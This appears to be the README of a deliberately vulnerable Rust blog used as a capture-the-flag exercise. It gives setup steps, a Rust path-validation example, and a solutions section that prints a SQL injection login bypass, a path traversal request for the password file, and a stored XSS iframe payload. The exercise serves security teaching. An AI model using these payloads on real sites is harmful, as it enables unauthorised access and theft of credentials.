This is a dummy website meant to be a CTF target.
A friend of yours who is learning web development asked you to help him test his simple blog website. You discover that there are security vulnerabilities in his website.
To complete the challenge, you have to:
- Log in as `admin` (easy)
- Get the admin password (medium)
- (Requires 2) Publish an article which pops up something when a user accesses the home page (hard)
- Clone the repository
- Create a `passwd` file and fill it with some password (make sure there is no whitespace after the text)
- Create a SQLite database in the server directory (either name it `db.sqlite` or change the name in `Rocket.toml`), and run the following query on it:

```sql
CREATE TABLE "users" (
    "username" TEXT NOT NULL UNIQUE,
    "password" TEXT NOT NULL,
    PRIMARY KEY("username")
)
```

- Start the web server with `cargo run --release`
- Go to http://localhost:8080/sign and register the `admin` user with the same password as in `passwd`
- Log out and you are ready to go!
⚠️ This section contains the solutions to the challenge. Take care not to read it if you want to do the challenge yourself!
The login form is vulnerable to SQL injection, so you can log in with something like:

```
Username: admin';--
Password: admin
```
The admin password is located in the `passwd` file.
The `GET /article?file` endpoint is vulnerable to path traversal, so you can get the file by requesting:

```
GET /article?file=../../passwd
```
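As an added, defender-side example (not code from the challenge repository), this is the kind of check the `/article?file` handler should apply before opening a file: it walks the components of the supplied value and rejects anything that could leave the articles directory. `ARTICLE_DIR` and `resolve_article_path` are hypothetical names.

```rust
use std::path::{Component, Path, PathBuf};

/// Directory the article handler is allowed to read from (hypothetical name).
pub const ARTICLE_DIR: &str = "articles";

/// Resolve a user-supplied `file` query value against `base` without letting
/// it escape `base`. Returns `None` when the value is empty, absolute, carries
/// a Windows drive prefix, or contains a parent-directory (`..`) component.
pub fn resolve_article_path(base: &Path, file: &str) -> Option<PathBuf> {
    let mut rel = PathBuf::new();
    for comp in Path::new(file).components() {
        match comp {
            // ordinary name: keep it
            Component::Normal(part) => rel.push(part),
            // "." changes nothing, skip it
            Component::CurDir => {}
            // "..", a leading "/" or a drive prefix could escape `base`
            Component::ParentDir | Component::RootDir | Component::Prefix(_) => return None,
        }
    }
    if rel.as_os_str().is_empty() {
        return None;
    }
    Some(base.join(rel))
}

fn main() {
    let base = Path::new(ARTICLE_DIR);
    // constructed sample inputs, including the traversal used in the solution above
    for file in ["hello", "./sub/post", "../../passwd", "/etc/passwd", "hello/../../passwd", ""] {
        match resolve_article_path(base, file) {
            Some(p) => println!("{file:?} -> {}", p.display()),
            None => println!("{file:?} -> rejected"),
        }
    }
}
```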
The `POST /api/article` endpoint is vulnerable to DOM injection, but the request requires Basic authentication. So you can create an article by requesting:

```
POST /api/article
Authorization: Basic <auth>
Content-Type: application/json

{
    "file": "vulnerable",
    "title": "<iframe src=\"javascript:alert('I am vulnerable')\">",
    "content": ""
}
```

where `<auth>` is the base64 representation of the string `admin:<passwd>` (`<passwd>` is the text you obtained in the previous task). You can convert a string into base64 using JavaScript's `btoa` function, for example.
Now, whenever a user goes to the home page, an alert saying `I am vulnerable` pops up.